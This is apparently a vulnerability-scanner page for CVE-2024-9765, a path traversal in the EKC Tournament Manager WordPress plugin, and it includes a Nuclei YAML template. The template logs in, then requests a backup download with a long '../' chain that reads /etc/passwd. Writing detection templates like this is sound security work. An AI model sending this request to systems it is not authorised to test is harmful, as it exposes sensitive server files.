EKC Tournament Manager WordPress plugin - Path Traversal
CVE-2024-9765
Verified
Description
EKC Tournament Manager WordPress plugin < 2.2.2 contains a path traversal caused by insufficient validation, letting logged in admin users download system files outside the WordPress directory.
Severity
Medium
CVSS Score
6.5
Exploit Probability
1%
Affected Product
ekc_tournament_manager
Published Date
February 23, 2026
Template Author
sourabh-sahu
CVE-2024-9765.yaml
id: CVE-2024-9765
info:
name: EKC Tournament Manager WordPress plugin - Path Traversal
author: Sourabh-Sahu
severity: medium
description: |
EKC Tournament Manager WordPress plugin < 2.2.2 contains a path traversal caused by insufficient validation, letting logged in admin users download system files outside the WordPress directory.
impact: |
Logged in admin users can download arbitrary system files, potentially exposing sensitive information.
remediation: |
Upgrade to version 2.2.2 or later.
reference:
- https://wpscan.com/vulnerability/c86157b0-43f3-4e82-9697-7dd9401b48d6/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2024-9765
cwe-id: NVD-CWE-noinfo
epss-score: 0.01414
epss-percentile: 0.69515
cpe: cpe:2.3:a:lukashuser:ekc_tournament_manager:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: lukashuser
product: ekc_tournament_manager
tags: cve,cve2024,lukashuser,ekc-tournament-manager,authenticated,lfi,vuln
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=
matchers:
- type: dsl
dsl:
- contains(header, "wordpress_logged_in")
internal: true
- raw:
- |
GET /wp-admin/admin.php?page=ekc-backup&action=download&backup=../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- regex('root:.*:0:0:', body)
condition: and
# digest: 4a0a0047304502204d97a54f6bb87233980eb2ae996403769e8d5f370e2d0fb13db04865d7b8a0b6022100f3a11ab9b1f90a683efcf0ac8b26b7e26e02c77e10054744067e8ca129e35a0f:922c64590222798bb761d5b6d8e729506.5Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2024-9765
CWE ID:
nvd-cwe-noinfo
Remediation Steps
Upgrade to version 2.2.2 or later.